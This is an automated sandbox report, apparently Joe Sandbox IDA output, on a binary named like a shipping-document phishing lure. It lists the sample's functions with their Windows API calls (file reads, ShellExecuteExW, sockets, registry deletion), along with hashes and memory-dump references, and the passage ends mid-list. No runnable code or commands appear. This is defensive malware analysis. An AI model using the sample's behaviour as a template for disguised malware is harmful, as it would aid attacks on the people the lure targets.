                                                                                                                              Similarity
                                                                                                                              • API ID: ShowWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1268545403-0
                                                                                                                              • Opcode ID: 1636628eed74ea736dd72c94b5117e8323e0920311239773a11a99fc5de81fab
                                                                                                                              • Instruction ID: d2c8fdc6774efdd85afb2841d92e8719515b5cc15a709e9879589ad2196e58f4
                                                                                                                              • Opcode Fuzzy Hash: 1636628eed74ea736dd72c94b5117e8323e0920311239773a11a99fc5de81fab
                                                                                                                              • Instruction Fuzzy Hash: 5C41E8716147C09FCB369B699E88BEA7B9AEB45320F28C81DF087865E0C675AC42D711
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A17186
                                                                                                                                • Part of subcall function 009D0F36: std::exception::exception.LIBCMT ref: 009D0F6C
                                                                                                                                • Part of subcall function 009D0F36: __CxxThrowException@8.LIBCMT ref: 009D0F81
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A171BD
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00A171D9
                                                                                                                              • _memmove.LIBCMT ref: 00A17227
                                                                                                                              • _memmove.LIBCMT ref: 00A17244
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00A17253
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A17268
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A17287
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 256516436-0
                                                                                                                              • Opcode ID: cc28ee0e259e7037f7adf01b75e7d9f8d4596f5885c9653a6eda21fe15ece5ef
                                                                                                                              • Instruction ID: 32d4380c9af386b65a3bb59c67c978694169c2d0acce00868e93200914f3c125
                                                                                                                              • Opcode Fuzzy Hash: cc28ee0e259e7037f7adf01b75e7d9f8d4596f5885c9653a6eda21fe15ece5ef
                                                                                                                              • Instruction Fuzzy Hash: 41317071900205EFCB10DFA8DC85AAF7778FF84710F2481AAF904AB256DB709E55CBA0
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00A3621D
                                                                                                                              • GetDC.USER32(00000000), ref: 00A36225
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,?,?,00A3905C,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 00A36230
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A3623C
                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A36278
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A36289
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A362C3
                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A362E3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3864802216-0
                                                                                                                              • Opcode ID: 7cd3cb620bf46b1fc4a981cb4095d4c30a6363e7fbad7881a586d9c15d02a102
                                                                                                                              • Instruction ID: a649a6d12e7fbe92cf258ceeb188bf12732f61ea06b14c1dfd216ba3aee6697e
                                                                                                                              • Opcode Fuzzy Hash: 7cd3cb620bf46b1fc4a981cb4095d4c30a6363e7fbad7881a586d9c15d02a102
                                                                                                                              • Instruction Fuzzy Hash: 49318D72611210BFEB108F94DC8AFEB3BA9EF0A711F044065FE089A191C7759842CB64
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                                • Part of subcall function 009CFE06: _wcscpy.LIBCMT ref: 009CFE29
                                                                                                                              • _wcstok.LIBCMT ref: 00A1ED20
                                                                                                                              • _wcscpy.LIBCMT ref: 00A1EDAF
                                                                                                                              • _memset.LIBCMT ref: 00A1EDE2
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                              • String ID: X
                                                                                                                              • API String ID: 774024439-3081909835
                                                                                                                              • Opcode ID: dba4071bf9a06ea7156d9e43717f33d847f78ec340ab53ea6c4b9fbdd41cd5b2
                                                                                                                              • Instruction ID: e0d709c4bdaf72cc545e103a270b2c33bd98ee6c189a9e75c988a1bfe025cdc2
                                                                                                                              • Opcode Fuzzy Hash: dba4071bf9a06ea7156d9e43717f33d847f78ec340ab53ea6c4b9fbdd41cd5b2
                                                                                                                              • Instruction Fuzzy Hash: DFC16D315083009FC724EF68C985B9AB7E5BFC5320F14492DF8999B2A2DB30ED45CB82
                                                                                                                              APIs
                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A26D16
                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A26D37
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A26D4A
                                                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00A26E00
                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00A26DBD
                                                                                                                                • Part of subcall function 00A0ABF4: _strlen.LIBCMT ref: 00A0ABFE
                                                                                                                                • Part of subcall function 00A0ABF4: _memmove.LIBCMT ref: 00A0AC20
                                                                                                                              • _strlen.LIBCMT ref: 00A26E5A
                                                                                                                              • _memmove.LIBCMT ref: 00A26EC3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3619996494-0
                                                                                                                              • Opcode ID: 35776102da63613b867d2faef32c7e88e6c6d6189fd9c00476da43a4dfe75acb
                                                                                                                              • Instruction ID: ee97efcd3f332e9cd2ea058efb33aa0c33376dcd032f9fa56c7b5f4532149e52
                                                                                                                              • Opcode Fuzzy Hash: 35776102da63613b867d2faef32c7e88e6c6d6189fd9c00476da43a4dfe75acb
                                                                                                                              • Instruction Fuzzy Hash: E581CC71504310ABD710EF28DD86FABB7A9AFC4724F144928F5569B2A2DA70ED01CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66d62f98f94a6df39236f525af20bc0b2fc540a75d4ca62ddd9afa902208e653
                                                                                                                              • Instruction ID: 69893969d8d0d99988fa586491d095e639f62c538b66c81989a745b8f94c546a
                                                                                                                              • Opcode Fuzzy Hash: 66d62f98f94a6df39236f525af20bc0b2fc540a75d4ca62ddd9afa902208e653
                                                                                                                              • Instruction Fuzzy Hash: 33717A30900109EFCB15CF99CD98AFFBB79FF86324F508159F915AA261D734AA51CBA0
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(00B62308), ref: 00A3B41F
                                                                                                                              • IsWindowEnabled.USER32(00B62308), ref: 00A3B42B
                                                                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00A3B50F
                                                                                                                              • SendMessageW.USER32(00B62308,000000B0,?,?), ref: 00A3B546
                                                                                                                              • IsDlgButtonChecked.USER32(?,?,?,?), ref: 00A3B583
                                                                                                                              • GetWindowLongW.USER32(00B62308,000000EC), ref: 00A3B5A5
                                                                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A3B5BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4072528602-0
                                                                                                                              • Opcode ID: d5062e3371873a10f074671e4731961b1330344398c20d35df93228a79aef835
                                                                                                                              • Instruction ID: 6224d5118ad782193d38bbe9f64ae35f5621601242efee9c10feec483677965c
                                                                                                                              • Opcode Fuzzy Hash: d5062e3371873a10f074671e4731961b1330344398c20d35df93228a79aef835
                                                                                                                              • Instruction Fuzzy Hash: CC71A034A11604EFDB25DF64CC95FAABBB6FF09300F148069FA56972A2C731A941CB24
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00A2F55C
                                                                                                                              • _memset.LIBCMT ref: 00A2F625
                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00A2F66A
                                                                                                                                • Part of subcall function 009B9997: __itow.LIBCMT ref: 009B99C2
                                                                                                                                • Part of subcall function 009B9997: __swprintf.LIBCMT ref: 009B9A0C
                                                                                                                                • Part of subcall function 009CFE06: _wcscpy.LIBCMT ref: 009CFE29
                                                                                                                              • GetProcessId.KERNEL32(00000000), ref: 00A2F6E1
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A2F710
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 3522835683-2766056989
                                                                                                                              • Opcode ID: 3178fdee03fd4f99216bb15a650a40875068b6165a56a43a80a04fa9ba5c8bfd
                                                                                                                              • Instruction ID: eeaf610e5495c5a033ab11504cbfbc75db367f3c95aab168150dbc262b1893dc
                                                                                                                              • Opcode Fuzzy Hash: 3178fdee03fd4f99216bb15a650a40875068b6165a56a43a80a04fa9ba5c8bfd
                                                                                                                              • Instruction Fuzzy Hash: 80616175A006299FCF14DF98D585AAEBBB5FF88310F148479E855AB361CB30AD41CB90
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 713648269e49812da4f14754098e2a8e7f64e95286f56ea6b11c085d494ebd9c
                                                                                                                              • Instruction ID: d8634b66d61172aa6b250acc1e4ef7ef080fbc2eaae2133c661949211f69a3d4
                                                                                                                              • Opcode Fuzzy Hash: 713648269e49812da4f14754098e2a8e7f64e95286f56ea6b11c085d494ebd9c
                                                                                                                              • Instruction Fuzzy Hash: DE51E4A0A187D63DFB3647348C45BFABEAA5F06704F084589E2E58A8C2C2D8ECD4D751
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 29d06caf46a54f353dbffabd4aaa305f9b7c479ac8f5f217a8c5b2ad048225e8
                                                                                                                              • Instruction ID: 63acf9f2b6e8db790dc81df861bc83e414a4ae1150e07ce33229732a09fa143a
                                                                                                                              • Opcode Fuzzy Hash: 29d06caf46a54f353dbffabd4aaa305f9b7c479ac8f5f217a8c5b2ad048225e8
                                                                                                                              • Instruction Fuzzy Hash: F151E7A0A047D63DFB3687748C45BFABEA95B06300F08469DF3D55A8C2D294ECD9D750
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2945705084-0
                                                                                                                              • Opcode ID: c85afae732ec7544f1c3434d2da41e495b44caab7f463504e86a5160eb12757c
                                                                                                                              • Instruction ID: d92d9514c2bb24302c5eba2a49b7b2b401e1c0fb5aa14b4cbfe90f211d909df9
                                                                                                                              • Opcode Fuzzy Hash: c85afae732ec7544f1c3434d2da41e495b44caab7f463504e86a5160eb12757c
                                                                                                                              • Instruction Fuzzy Hash: 5541A5A9C60914BACB11EBB49C86ADFB7B89F85310F10C867F518E3261E6349745C3E6
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A146AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A136DB,?), ref: 00A146CC
                                                                                                                                • Part of subcall function 00A146AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A136DB,?), ref: 00A146E5
                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00A136FB
                                                                                                                              • _wcscmp.LIBCMT ref: 00A13717
                                                                                                                              • MoveFileW.KERNEL32 ref: 00A1372F
                                                                                                                              • _wcscat.LIBCMT ref: 00A13777
                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 00A137E3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 1377345388-1173974218
                                                                                                                              • Opcode ID: 00fe3c9f085314e1926a7f19aa06f44cff5213560e649e9fe936cf290a869a0e
                                                                                                                              • Instruction ID: e7a4225fba0cb7121c8870fae95936031fb62e8ffa7bbc29fe283b87107374a2
                                                                                                                              • Opcode Fuzzy Hash: 00fe3c9f085314e1926a7f19aa06f44cff5213560e649e9fe936cf290a869a0e
                                                                                                                              • Instruction Fuzzy Hash: 4D4182B2508345AECB51EF64D941ADFB7ECEF89380F00092EB49AC3191EA34D789C756
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3866635326-4108050209
                                                                                                                              • Opcode ID: 7712164643d9a3ca60e7e571ca82c9221fa3525ab0a4e4e09310f94a8031d31d
                                                                                                                              • Instruction ID: c9d0e267a09f7926197b50792528961f9da70fddc65d2e785cba3ea37156ef8a
                                                                                                                              • Opcode Fuzzy Hash: 7712164643d9a3ca60e7e571ca82c9221fa3525ab0a4e4e09310f94a8031d31d
                                                                                                                              • Instruction Fuzzy Hash: 904117B5A04209EFDB21DFA0D884EAEBBF8FB08314F048029FD159B260D770AD51DB90
                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A3105C
                                                                                                                              • RegOpenKeyExW.ADVAPI32 ref: 00A31086
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A3113D
                                                                                                                                • Part of subcall function 00A3102D: RegCloseKey.ADVAPI32(?), ref: 00A310A3
                                                                                                                                • Part of subcall function 00A3102D: FreeLibrary.KERNEL32(?), ref: 00A310F5
                                                                                                                                • Part of subcall function 00A3102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A31118
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A310E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 395352322-0
                                                                                                                              • Opcode ID: 76bd3af202ffe0d30b847725237fd19ba2cd72091129fc5db5cd750520c86a9e
                                                                                                                              • Instruction ID: f39eed03e377a5fe83711e478d723304f3961330800b2fbd2177b3957d3c3624
                                                                                                                              • Opcode Fuzzy Hash: 76bd3af202ffe0d30b847725237fd19ba2cd72091129fc5db5cd750520c86a9e
                                                                                                                              • Instruction Fuzzy Hash: BC311AB1911119BFDB18DB94ED89EFFB7BCEB09340F000169F601A2151EB749E869AA0
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A3631E
                                                                                                                              • GetWindowLongW.USER32(00B62308,000000F0), ref: 00A36351
                                                                                                                              • GetWindowLongW.USER32(00B62308,000000F0), ref: 00A36386
                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A363B8
                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A363E2
                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A363F3
                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000,?,?,?,00A39E6E,?,?,?,?), ref: 00A3640D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2178440468-0
                                                                                                                              • Opcode ID: 2065e8fb70c0f38e573b786a788d3551c3e4adf82de27f09729c037260ab6f8d
                                                                                                                              • Instruction ID: 70729a218083608dd72bf714cdf2572e4bcc0e3db2bd48364ee5eb46dcb454ac
                                                                                                                              • Opcode Fuzzy Hash: 2065e8fb70c0f38e573b786a788d3551c3e4adf82de27f09729c037260ab6f8d
                                                                                                                              • Instruction Fuzzy Hash: 12310531A44250AFDB21CFA8DC85F5537E1FB4A710F1981A4F5158F2B2CB72A881DB51
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A27EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A27ECB
                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A262DC
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A262EB
                                                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A26324
